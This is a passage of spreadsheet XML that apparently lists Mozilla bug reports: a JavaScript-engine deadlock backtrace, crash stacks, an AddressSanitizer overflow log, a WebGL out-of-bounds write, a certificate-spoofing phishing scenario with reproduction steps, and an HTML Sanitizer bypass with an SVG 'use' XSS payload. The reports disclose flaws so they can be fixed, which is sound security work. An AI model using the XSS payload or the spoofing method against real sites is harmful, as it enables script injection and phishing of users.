          <t>FIXED</t>
        </is>
      </c>
      <c r="P2123" t="inlineStr"/>
      <c r="Q2123" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2123" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2123" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T2123" t="n">
        <v>1</v>
      </c>
      <c r="U2123" t="n">
        <v>0</v>
      </c>
      <c r="V2123" t="n">
        <v>12</v>
      </c>
      <c r="W2123" t="inlineStr">
        <is>
          <t>We have seen this deadlock several times.  Here's a good example.
45 threads are blocked on ClaimScope(0x81426b8).
11 threads are blocked on ClaimScope(0xb8a02e8).
All of these are at jslock.c:444, PR_WaitCondVar(rt-&gt;scopeSharingDone...)
Two other threads are blocked on js_LockScope, in particular thread 139:
#0  0xdf6a06e9 in _lwp_sema_wait () from /usr/lib/libc.so.1
#1  0xdfbb2d5d in _park () from /usr/lib/libthread.so.1
#2  0xdfbb29df in _swtch () from /usr/lib/libthread.so.1
#3  0xdfbb1b79 in cond_wait () from /usr/lib/libthread.so.1
#4  0xdf82f28c in _MD_WAIT_CV (md_cv=0x8135d3c, md_lock=0x8135cf4,
    timeout=4294967295) at solaris.c:308
#5  0xdf822b6c in _PR_WaitCondVar (thread=0x81de378, cvar=0x8135d18,
    lock=0x8135cd8, timeout=4294967295) at prucv.c:201
#6  0xdf823063 in PR_WaitCondVar (cvar=0x8135d18, timeout=4294967295)
    at prucv.c:548
#7  0xdf4f6015 in js_SuspendThread (tl=0x8149e60) at jslock.c:835
#8  0xdf4f60e5 in js_Enqueue (tl=0x8149e60, me=136176504) at jslock.c:876
#9  0xdf4f6187 in js_Lock (tl=0x8149e60, me=136176504) at jslock.c:909
#10 0xdf4f624d in js_LockScope (cx=0x4, scope=0x8149e38) at jslock.c:966
#11 0xdf4f62f0 in js_LockObj (cx=0xa0ff770, obj=0x813e6b0) at jslock.c:1050
#12 0xdf4fc6f6 in js_LookupProperty (cx=0xa0ff770, obj=0x813e6b0,
    id=135512456, objp=0xdc19856c, propp=0xdc198570) at jsobj.c:1956
#13 0xdf4fcc05 in js_GetProperty (cx=0xa0ff770, obj=0x813e6b0, id=135512456,
    vp=0xdc1985a0) at jsobj.c:2122
#14 0xdf4fbc99 in js_NewObject (cx=0xa0ff770, clasp=0xdf522aa0,
    proto=0x813e6b0, parent=0x0) at jsobj.c:1554
...
#44 0xdf4d2afe in JS_CompileUCScript (cx=0xa0ff770, obj=0x813df40,
    chars=0xaf11900, length=24143,
    filename=0xdc198ef8 "http://wakeup.vui.en-us.tellme.com/wakeup.js",
    lineno=0) at jsapi.c:2807
Note that threads 139 is trying to lock the same scope 0x8149e38.
The owner of scope 0x8149e38 is thread 0x81c41f8, which is thread 127, one of
the 45 threads blocked on ClaimScope(0x81426b8).
Thread 127 (LWP    39        ):
#0  0xdf6a06e9 in _lwp_sema_wait () from /usr/lib/libc.so.1
#1  0xdfbb2d5d in _park () from /usr/lib/libthread.so.1
#2  0xdfbb29df in _swtch () from /usr/lib/libthread.so.1
#3  0xdfbb1b79 in cond_wait () from /usr/lib/libthread.so.1
#4  0xdf82f28c in _MD_WAIT_CV (md_cv=0x813c68c, md_lock=0x8112314,
    timeout=4294967295) at solaris.c:308
#5  0xdf822b6c in _PR_WaitCondVar (thread=0x81c41f8, cvar=0x813c668,
    lock=0x81122f8, timeout=4294967295) at prucv.c:201
#6  0xdf823063 in PR_WaitCondVar (cvar=0x813c668, timeout=4294967295)
    at prucv.c:548
#7  0xdf4f5964 in ClaimScope (scope=0x81426b8, cx=0xa142200) at jslock.c:444
#8  0xdf4f59f9 in js_GetSlotThreadSafe (cx=0xa142200, obj=0x813e068, slot=2)
    at jslock.c:494
#9  0xdf4feb31 in js_GetClassPrototype (cx=0xa142200, name=0xdf517b10 "Array",
    protop=0x4) at jsobj.c:2987
#10 0xdf4fbc14 in js_NewObject (cx=0xa142200, clasp=0xdf520700, proto=0x0,
    parent=0x0) at jsobj.c:1540
#11 0xdf4d5f1a in js_NewArrayObject (cx=0xa142200, length=0, vector=0x0)
    at jsarray.c:1410
#12 0xdf50c654 in js_ExecuteRegExp (cx=0xa142200, re=0xa17ce88, str=0xba87d28,
    indexp=0xdc4b05e0, test=0, rval=0xdc4b06e0) at jsregexp.c:2130
#13 0xdf512d01 in match_or_replace (cx=0xa142200, obj=0xba87d30, argc=4,
    argv=0xa17ce88, glob=0xdf512d38 &lt;match_glob&gt;, data=0xdc4b062c,
    rval=0xdc4b06e0, forceFlat=0) at jsstr.c:992
#14 0xdf512e0b in str_match (cx=0xa142200, obj=0xba87d30, argc=1,
    argv=0xbaac740, rval=0xdc4b06e0) at jsstr.c:1047
#15 0xdf4ec551 in js_Invoke (cx=0xa142200, argc=1, flags=0) at jsinterp.c:777
#16 0xdf4f31c9 in js_Interpret (cx=0xa142200, result=0xdc4b0994)
    at jsinterp.c:2668
#17 0xdf4ec966 in js_Execute (cx=0xa142200, chain=0xba87c98, script=0x0,
    down=0x0, special=4, result=0xdc4b0994) at jsinterp.c:956
#18 0xdf4d3214 in JS_ExecuteScript (cx=0xa142200, obj=0xba87c98,
    script=0xa17e208, rval=0xdc4b0994) at jsapi.c:3150
The scope being claimed has ownercx=0xa0ff770, which is thread 139.  There
is definitely a two-way deadlock here between thread 127 and thread 139.
GC is not running.</t>
        </is>
      </c>
      <c r="X2123" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2124">
      <c r="A2124" t="n">
        <v>1586195</v>
      </c>
      <c r="B2124" t="inlineStr">
        <is>
          <t>2019-10-04 00:51:31 -0700</t>
        </is>
      </c>
      <c r="C2124" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::net::HttpChannelParent::RecvRedirect2Verify]</t>
        </is>
      </c>
      <c r="D2124" t="inlineStr">
        <is>
          <t>2022-01-10 05:40:29 -0800</t>
        </is>
      </c>
      <c r="E2124" t="n">
        <v>1</v>
      </c>
      <c r="F2124" t="n">
        <v>1</v>
      </c>
      <c r="G2124" t="n">
        <v>3</v>
      </c>
      <c r="H2124" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2124" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2124" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2124" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2124" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2124" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N2124" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2124" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2124" t="inlineStr">
        <is>
          <t>[necko-triaged]</t>
        </is>
      </c>
      <c r="Q2124" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2124" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2124" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T2124" t="n">
        <v>1</v>
      </c>
      <c r="U2124" t="n">
        <v>0</v>
      </c>
      <c r="V2124" t="n">
        <v>6</v>
      </c>
      <c r="W2124" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-6a42e4b3-345f-4cd5-b0ee-de0b90191003.
```
Top 10 frames of crashing thread:
0 xul.dll class mozilla::ipc::IPCResult mozilla::net::HttpChannelParent::RecvRedirect2Verify netwerk/protocol/http/HttpChannelParent.cpp:942
1 xul.dll mozilla::net::PHttpChannelParent::OnMessageReceived ipc/ipdl/PHttpChannelParent.cpp:886
2 xul.dll mozilla::dom::PContentParent::OnMessageReceived ipc/ipdl/PContentParent.cpp:5873
3 xul.dll mozilla::ipc::MessageChannel::DispatchMessage ipc/glue/MessageChannel.cpp:2109
4 xul.dll mozilla::ipc::MessageChannel::MessageTask::Run ipc/glue/MessageChannel.cpp:1985
5 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1225
6 xul.dll NS_ProcessNextEvent xpcom/threads/nsThreadUtils.cpp:486
7 xul.dll mozilla::ipc::MessagePump::Run ipc/glue/MessagePump.cpp:88
8 xul.dll MessageLoop::RunHandler ipc/chromium/src/base/message_loop.cc:308
9 xul.dll MessageLoop::Run ipc/chromium/src/base/message_loop.cc:290
```
There are 11 crashes (from 9 installations) in nightly 71 starting with buildid 20191003093956. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1584207.
[1] https://hg.mozilla.org/mozilla-central/rev?node=effee4ab270c</t>
        </is>
      </c>
      <c r="X2124" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2125">
      <c r="A2125" t="n">
        <v>1189860</v>
      </c>
      <c r="B2125" t="inlineStr">
        <is>
          <t>2015-07-31 11:14:03 -0700</t>
        </is>
      </c>
      <c r="C2125" t="inlineStr">
        <is>
          <t>Missing bounds check causes memory-safety bug in ProgramBinary::linkAttributes</t>
        </is>
      </c>
      <c r="D2125" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:51 -0700</t>
        </is>
      </c>
      <c r="E2125" t="n">
        <v>1</v>
      </c>
      <c r="F2125" t="n">
        <v>1</v>
      </c>
      <c r="G2125" t="n">
        <v>3</v>
      </c>
      <c r="H2125" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2125" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2125" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2125" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L2125" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2125" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2125" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2125" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2125" t="inlineStr">
        <is>
          <t>[adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q2125" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2125" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2125" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T2125" t="n">
        <v>1</v>
      </c>
      <c r="U2125" t="n">
        <v>0</v>
      </c>
      <c r="V2125" t="n">
        <v>20</v>
      </c>
      <c r="W2125" t="inlineStr">
        <is>
          <t>Created attachment 8641769
HTML and JS files. Extract and use as in note [1].
ProgramBinary::linkAttributes (gfx\angle\src\libGLESv2\ProgramBinary.cpp) does not bounds-check accesses to its mShaderAttributes array. Because this is a fixed-length array (gfx\angle\src\libGLESv2\renderer\ProgramImpl.h):
122:    sh::Attribute mShaderAttributes[gl::MAX_VERTEX_ATTRIBS];
where
17:     MAX_VERTEX_ATTRIBS = 16,
(gfx\angle\src\libGLESv2\Constants.h),
and because of the absence of bounds checks elsewhere, it is possible to create more shader attributes than mShaderAttributes can accommodate. This causes ProgramBinary::linkAttributes to write data beyond the end of mShaderAttributes (and indeed beyond the end of *mProgram) into whatever other heap object lives there.
Attached is a proof-of-concept WebGL program [1] that causes this overwriting.
The best way to observe it is to attach a debugger to FF debug 39.0, set a breakpoint on ProgramBinary::linkAttributes:
683:        mProgram-&gt;getShaderAttributes()[attributeIndex] = attribute;
and observe how attributesIndex gets incremented beyond the end of mShaderAttributes. You can then open a memory window to ((char *) &amp;mProgram-&gt;mShaderAttributes) + sizeof (mProgram-&gt;mShaderAttributes) and step into the assignment. In my limited testing, the memory beyond the end of mShaderAttributes contains data that makes line 50 of ShaderVariable::operator= (gfx\angle\src\compiler\translator\ShaderVars.cpp) fail with a write-to-nullptr:
45: ShaderVariable &amp;ShaderVariable::operator=(const ShaderVariable &amp;other)
46: {
47:     type = other.type;
48:     precision = other.precision;
49:     name = other.name;
50:     mappedName = other.mappedName;
51:     arraySize = other.arraySize;
52:     staticUse = other.staticUse;
53:     fields = other.fields;
54:     structName = other.structName;
55:     return *this;
56: }
after lines 47-49 have written 5 or so DWORDs into the unowned memory. However, the unowned memory probably can contain anything at all, and if the memory occupied by, e.g., mappedName were to contain a valid pointer to heap memory, the assignment on line 50 would free it, causing havoc down the road.
The proof-of-concept also crashes 40.0b8 Win64 release, in which it writes about 10 DWORDs of data into the unowned memory before crashing. I have not yet examined whether it frees any unowned memory before crashing.
[1] See attached HTML and JS; extract and name the JS "poc.js" and put it in the same folder as the extracted HTML, then load the HTML.</t>
        </is>
      </c>
      <c r="X2125" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2126">
      <c r="A2126" t="n">
        <v>402347</v>
      </c>
      <c r="B2126" t="inlineStr">
        <is>
          <t>2007-11-03 07:51:18 -0700</t>
        </is>
      </c>
      <c r="C2126" t="inlineStr">
        <is>
          <t>Not binding X.509 certificate to originating domain name allows certificate spoofing</t>
        </is>
      </c>
      <c r="D2126" t="inlineStr">
        <is>
          <t>2022-10-18 12:24:02 -0700</t>
        </is>
      </c>
      <c r="E2126" t="n">
        <v>1</v>
      </c>
      <c r="F2126" t="n">
        <v>1</v>
      </c>
      <c r="G2126" t="n">
        <v>3</v>
      </c>
      <c r="H2126" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2126" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2126" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K2126" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2126" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2126" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2126" t="inlineStr"/>
      <c r="Q2126" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2126" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2126" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2126" t="n">
        <v>0</v>
      </c>
      <c r="U2126" t="n">
        <v>0</v>
      </c>
      <c r="V2126" t="n">
        <v>39</v>
      </c>
      <c r="W2126" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; da-DK; rv:1.8.1.8) Gecko/20061201 Firefox/2.0.0.8 (Ubuntu-feisty)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; da-DK; rv:1.8.1.8) Gecko/20061201 Firefox/2.0.0.8 (Ubuntu-feisty)
Mozilla based browsers do not bind a user-approved webserver certificate to the originating domain name. This make the user vulnerable to certificate spoofing by "subjectAltName:dNSName"-extensions. Scenario:
(1) Assumed a phisher could redirect a user's browser to his prepared spoofing webserver (by MITM or DNS spoofing or domain hijacking or ...). But the spoofed webserver "www.paypal.com" uses a webserver cert signed by a browser-accredited CA, such that the user's browser would raise a "unknown CA" warning (that's what X.509 and TLS is all about!), so the phisher defers this step.
(2) The phisher creates a website "www.example.com" and a home brewed X.509 cert:
  DN="CN=www.example.com"
  subjectAltName:dNSName=www.example.com
  subjectAltName:dNSName=www.paypal.com
and lures the user to https://www.example.com/. The user gets a "unknown CA" warning, but the "subjectAltName:dNSName" extensions are not shown to him (see bug #238142). As he does not plan to enter any relevant information, he accepts the cert (temporarily or permanently) and proceeds to download some pics.
(3) Any time later (if the cert got accepted temporarily this has to happen within the same session), the phisher lures the user to his spoofed https://www.paypal.com/, using the very same self-signed certificate. NO WARNING.
I consider this a severe cert-spoofing issue. Mozillas "match any wildcard"-behaviour (bug #159483) makes it worse.
Reproducible: Always
Steps to Reproduce:
1. Create a X.509 cert with DN="CN=www.example.com", subjectAltName:dNSName="www.example.com" and subjectAltName:dNSName="www.example.net". Configure (virtual) https-hosts "www.example.com" and "www.example.net" using this cert.
2. Go to &lt;https://www.example.com/&gt;
3. Go to &lt;https://www.example.net/&gt;
Actual Results:  
No warning in step 3
Expected Results:  
Raise a warning like 'The webserver "www.example.net" presents a certificate issued by an unknown CA. You have already accepted this certificate, but for the domain name(s) "www.example.com". It is possible, though unlikely, that someone may be trying to intercept your communication with this web site. Do you want to accept this certificate for "www.example.net", too?'
Demonstration at &lt;http://test.eonis.net/&gt;
More details at &lt;https://nils.toedtmann.net/pub/subjectAltName.txt&gt; (sorry, home made CA again ;)
Bug #159483: "cert name matching: RFC 2818 vs. backwards compatibility"
Bug #238142: "server mismatch dialog doesn't show subject alt names"
Tested: Firefox 2.0.0.8 Linux/FreeBSD, Firefox 2.0.0.9/Windows, Firefox 3.0a8 Linux/Windows, SeaMonkey 1.1.5/Windows and some more.</t>
        </is>
      </c>
      <c r="X2126" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2127">
      <c r="A2127" t="n">
        <v>989183</v>
      </c>
      <c r="B2127" t="inlineStr">
        <is>
          <t>2014-03-27 19:38:12 -0700</t>
        </is>
      </c>
      <c r="C2127" t="inlineStr">
        <is>
          <t>Global-buffer-overflow in nsXBLProtoImpl::InstallImplementation</t>
        </is>
      </c>
      <c r="D2127" t="inlineStr">
        <is>
          <t>2024-05-30 08:33:23 -0700</t>
        </is>
      </c>
      <c r="E2127" t="n">
        <v>1</v>
      </c>
      <c r="F2127" t="n">
        <v>1</v>
      </c>
      <c r="G2127" t="n">
        <v>3</v>
      </c>
      <c r="H2127" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2127" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2127" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K2127" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2127" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2127" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2127" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2127" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q2127" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2127" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2127" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T2127" t="n">
        <v>1</v>
      </c>
      <c r="U2127" t="n">
        <v>0</v>
      </c>
      <c r="V2127" t="n">
        <v>34</v>
      </c>
      <c r="W2127" t="inlineStr">
        <is>
          <t>Created attachment 8398290
Testcase
I have fuzzPriv extension that makes this easier to reproduce.
&gt;==359==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fcc9dcee2c8 at pc 0x7fcc97373f8f bp 0x7fffec68f930 sp 0x7fffec68f928
&gt;READ of size 4 at 0x7fcc9dcee2c8 thread T0
&gt;    #0 0x7fcc97373f8e in Hold dom/xbl/nsXBLService.h:159
&gt;    #1 0x7fcc97373f8e in AddRef dom/xbl/nsXBLService.h:161
&gt;    #2 0x7fcc97373f8e in assign_with_AddRef objdir-ff-asan/dom/xbl/../../dist/include/nsAutoPtr.h:865
&gt;    #3 0x7fcc97373f8e in operator= objdir-ff-asan/dom/xbl/../../dist/include/nsAutoPtr.h:957
&gt;    #4 0x7fcc97373f8e in fromJSClass dom/xbl/nsXBLBinding.h:73
&gt;    #5 0x7fcc97373f8e in nsXBLProtoImpl::InstallImplementation(nsXBLPrototypeBinding*, nsXBLBinding*) dom/xbl/nsXBLProtoImpl.cpp:66
&gt;    #6 0x7fcc973a1eb4 in nsXBLService::LoadBindings(nsIContent*, nsIURI*, nsIPrincipal*, nsXBLBinding**, bool*) dom/xbl/nsXBLService.cpp:516
&gt;    #7 0x7fcc9856fd4a in nsCSSFrameConstructor::AddFrameConstructionItemsInternal(nsFrameConstructorState&amp;, nsIContent*, nsIFrame*, nsIAtom*, int, bool, nsStyleContext*, unsigned int, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;*, nsCSSFrameConstructor::FrameConstructionItemList&amp;) layout/base/nsCSSFrameConstructor.cpp:5207
&gt;    #8 0x7fcc98592cc2 in nsCSSFrameConstructor::BuildInlineChildItems(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, bool, bool) layout/base/nsCSSFrameConstructor.cpp:10714
&gt;    #9 0x7fcc9857289f in nsCSSFrameConstructor::AddFrameConstructionItemsInternal(nsFrameConstructorState&amp;, nsIContent*, nsIFrame*, nsIAtom*, int, bool, nsStyleContext*, unsigned int, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;*, nsCSSFrameConstructor::FrameConstructionItemList&amp;) layout/base/nsCSSFrameConstructor.cpp:5394
&gt;    #10 0x7fcc9858d15f in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&amp;, nsIContent*, bool, nsIFrame*, nsCSSFrameConstructor::FrameConstructionItemList&amp;) layout/base/nsCSSFrameConstructor.cpp:5148
&gt;    #11 0x7fcc9859e2fc in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool) layout/base/nsCSSFrameConstructor.cpp:6748
&gt;    #12 0x7fcc9859923c in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) layout/base/nsCSSFrameConstructor.cpp:6427
&gt;    #13 0x7fcc985992a8 in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) layout/base/nsCSSFrameConstructor.cpp:6434
&gt;    #14 0x7fcc985992a8 in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) layout/base/nsCSSFrameConstructor.cpp:6434
&gt;    #15 0x7fcc9859f9e9 in nsCSSFrameConstructor::CreateNeededFrames() layout/base/nsCSSFrameConstructor.cpp:6449
&gt;    #16 0x7fcc984c2477 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) layout/base/nsPresShell.cpp:4042
&gt;    #17 0x7fcc984f7673 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1142
&gt;    #18 0x7fcc984fbd34 in TickDriver layout/base/nsRefreshDriver.cpp:168
&gt;    #19 0x7fcc984fbd34 in mozilla::RefreshDriverTimer::Tick() layout/base/nsRefreshDriver.cpp:160
&gt;    #20 0x7fcc94035fc4 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:551
&gt;    #21 0x7fcc9403664e in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:635
&gt;    #22 0x7fcc9402d4e0 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:694
&gt;    #23 0x7fcc93ef8d5a in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #24 0x7fcc947f0159 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
&gt;    #25 0x7fcc94799130 in RunInternal ipc/chromium/src/base/message_loop.cc:226
&gt;    #26 0x7fcc94799130 in RunHandler ipc/chromium/src/base/message_loop.cc:219
&gt;    #27 0x7fcc94799130 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:193
&gt;    #28 0x7fcc96906447 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
&gt;    #29 0x7fcc9971ccb8 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:276
&gt;    #30 0x7fcc9958c1a3 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4019
&gt;    #31 0x7fcc9958d08d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4088
&gt;    #32 0x7fcc9958dedd in XRE_main toolkit/xre/nsAppRunner.cpp:4300
&gt;    #33 0x48c6e7 in do_main browser/app/nsBrowserApp.cpp:282
&gt;    #34 0x48c6e7 in main browser/app/nsBrowserApp.cpp:643
&gt;    #35 0x7fcca259276c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
&gt;    #36 0x48bbbc in _start
&gt;
&gt;0x7fcc9dcee2c8 is located 0 bytes to the right of global variable 'JSObject::class_' from 'objdir-ff-asan/js/src/Unified_cpp_js_src7.cpp' (0x7fcc9dcee160) of size 360
&gt;SUMMARY: AddressSanitizer: global-buffer-overflow ??:0 ??
&gt;Shadow bytes around the buggy address:
&gt;  0x0ffa13b95c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0ffa13b95c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0ffa13b95c20: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
&gt;  0x0ffa13b95c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0ffa13b95c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;=&gt;0x0ffa13b95c50: 00 00 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 f9 f9
&gt;  0x0ffa13b95c60: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0ffa13b95c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0ffa13b95c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0ffa13b95c90: 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
&gt;  0x0ffa13b95ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:       fa
&gt;  Heap right redzone:      fb
&gt;  Freed heap region:       fd
&gt;  Stack left redzone:      f1
&gt;  Stack mid redzone:       f2
&gt;  Stack right redzone:     f3
&gt;  Stack partial redzone:   f4
&gt;  Stack after return:      f5
&gt;  Stack use after scope:   f8
&gt;  Global redzone:          f9
&gt;  Global init order:       f6
&gt;  Poisoned by user:        f7
&gt;  Contiguous container OOB:fc
&gt;  ASan internal:           fe
&gt;==359==ABORTING
&gt;
&gt;</t>
        </is>
      </c>
      <c r="X2127" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2128">
      <c r="A2128" t="n">
        <v>1757210</v>
      </c>
      <c r="B2128" t="inlineStr">
        <is>
          <t>2022-02-25 09:42:20 -0800</t>
        </is>
      </c>
      <c r="C2128" t="inlineStr">
        <is>
          <t>Bypass of HTML Sanitizer API using same origin use element</t>
        </is>
      </c>
      <c r="D2128" t="inlineStr">
        <is>
          <t>2024-05-30 10:54:18 -0700</t>
        </is>
      </c>
      <c r="E2128" t="n">
        <v>1</v>
      </c>
      <c r="F2128" t="n">
        <v>1</v>
      </c>
      <c r="G2128" t="n">
        <v>3</v>
      </c>
      <c r="H2128" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2128" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2128" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2128" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2128" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2128" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2128" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2128" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2128" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][domsecurity-active][post-critsmash-triage][adv-main102+]</t>
        </is>
      </c>
      <c r="Q2128" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2128" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2128" t="inlineStr">
        <is>
          <t>101 Branch</t>
        </is>
      </c>
      <c r="T2128" t="n">
        <v>1</v>
      </c>
      <c r="U2128" t="n">
        <v>0</v>
      </c>
      <c r="V2128" t="n">
        <v>15</v>
      </c>
      <c r="W2128" t="inlineStr">
        <is>
          <t>I was testing the Mozilla Sanitizer API that was introduced recently:
https://developer.mozilla.org/en-US/docs/Web/API/Sanitizer
I found it was possible to use same origin use elements provided you specify the absolute URL. On Firefox same origin 'use' elements allow JavaScript execution whereas Chrome seems to block them. At least the auto executing part. The attack would work if an attacker has control over a same origin resource e.g. file upload. Even if this resource is served with a content disposition header the attack still works.
Example of same origin use elements causing JavaScript execution:
https://portswigger-labs.net/xss/xss.php?x=%3Csvg%3E%3Cuse%20href=%22//portswigger-labs.net/use_element/upload.php%23x%22/%3E%3C/svg%3E
Firefox (Nightly) version tested:
99.0a1 (2022-02-25)
Tested Sanitizer on here:
https://mozilla.github.io/sanitizer-polyfill/demo/
Input:
&lt;svg&gt;&lt;use href="https://mozilla.github.io/sanitizer-polyfill/demo/upload.php#x" /&gt;
Output:
&lt;div&gt;&lt;svg&gt;&lt;use href="https://mozilla.github.io/sanitizer-polyfill/demo/upload.php#x"&gt;&lt;/use&gt;&lt;/svg&gt;&lt;/div&gt;</t>
        </is>
